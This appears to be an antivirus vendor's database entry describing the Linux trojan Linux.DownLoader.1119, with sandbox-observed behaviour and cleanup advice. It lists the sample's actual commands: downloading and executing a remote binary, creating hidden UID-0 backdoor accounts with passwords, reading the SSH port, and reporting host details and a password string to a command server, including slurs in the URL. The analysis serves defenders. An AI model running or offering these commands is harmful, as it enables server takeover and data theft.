Library
My library

+ Add to library

Profile

Linux.DownLoader.1119

Added to the Dr.Web virus database: 2019-06-14

Virus description added:

Technical Information

Malicious functions:
Removes itself
Launches processes:
  • bash
  • wget -q http://thebestperlscripts.cf/.../os -O protections
  • chmod 777 protections
  • ./protections
  • tr -d ./
  • clear
  • useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system
  • useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os
  • nscd -i passwd
  • nscd -i group
  • passwd system
  • passwd os
  • grep -Ew #Port|Port /etc/ssh/sshd_config
  • head -n1
  • awk {print $2}
  • lsb_release -d
  • awk {$1= \"\"; print $0}
  • nproc --all
  • free -mt
  • grep Total:
  • wget -qO- http://5.135.9.132/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=22&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS= Debian GNU/Linux 8.3 (jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
Performs operations with the file system:
Modifies file access rights:
  • /root/protections
  • /etc/passwd+
  • /etc/shadow+
  • /etc/subuid+
  • /etc/subgid+
  • /etc/nshadow
Creates symlinks:
  • /etc/passwd.lock
  • /etc/group.lock
  • /etc/gshadow.lock
  • /etc/subuid.lock
  • /etc/subgid.lock
  • /etc/shadow.lock
Creates or modifies files:
  • /root/protections
  • /etc/.pwd.lock
  • /etc/passwd.720
  • /etc/group.720
  • /etc/gshadow.720
  • /etc/subuid.720
  • /etc/subgid.720
  • /etc/shadow.720
  • /etc/passwd-
  • /etc/passwd+
  • /etc/shadow-
  • /etc/shadow+
  • /etc/subuid-
  • /etc/subuid+
  • /etc/subgid-
  • /etc/subgid+
  • /etc/passwd.724
  • /etc/group.724
  • /etc/gshadow.724
  • /etc/subuid.724
  • /etc/subgid.724
  • /etc/shadow.724
  • /etc/nshadow
Deletes files:
  • /etc/passwd.720
  • /etc/group.720
  • /etc/gshadow.720
  • /etc/subuid.720
  • /etc/subgid.720
  • /etc/shadow.720
  • /etc/shadow.lock
  • /etc/passwd.lock
  • /etc/group.lock
  • /etc/gshadow.lock
  • /etc/subuid.lock
  • /etc/subgid.lock
  • /etc/passwd.724
  • /etc/group.724
  • /etc/gshadow.724
  • /etc/subuid.724
  • /etc/subgid.724
  • /etc/shadow.724
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
HTTP GET requests:
  • th#######rlscripts.cf/.../os
  • http://#.###.#.##########################.#####################HECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=%20Debian%20GNU/Linux%208.3%20(jessie)&TOTALCPU=1&TOTALRAM=959&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse
DNS ASK:
  • th#####perlscripts.cf
Other:
Collects CPU information
Collects RAM information

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number